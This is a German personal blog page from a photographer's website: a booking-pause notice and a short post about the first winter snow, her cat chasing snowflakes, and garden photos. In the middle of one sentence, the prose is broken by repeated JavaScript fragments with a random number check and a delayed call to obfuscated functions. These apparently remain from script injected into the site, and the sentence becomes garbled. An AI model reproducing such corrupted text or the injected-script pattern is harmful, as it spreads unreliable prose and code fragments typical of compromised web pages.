Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Schneeimpressionen

Heute Morgen habe ich nicht schlecht geschaut, als ich aus dem Fenster in die „Finsternis“ starrte – Der erste Schnee in diesem Winter! – Bedingt durch meinen Kater, der seinen morgendlichen Spaziergang starten wollte, war es 7:00 Uhr und als mich das Licht des Schnees anfunkelte war ich natürlich in Hochstimmung ♥ Ich liebe Schnee. Und somit dauerte es nicht lange und Matty und ich stdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden in der dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Schneepracht. Wie schön es ist, die kleinen Dinge sehen zu lernen und meinen Kater beim Jagen der Schneeflocken zuzuschauen. Und hier ein paar Impressionen aus dem Garten.

Keine Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

Menu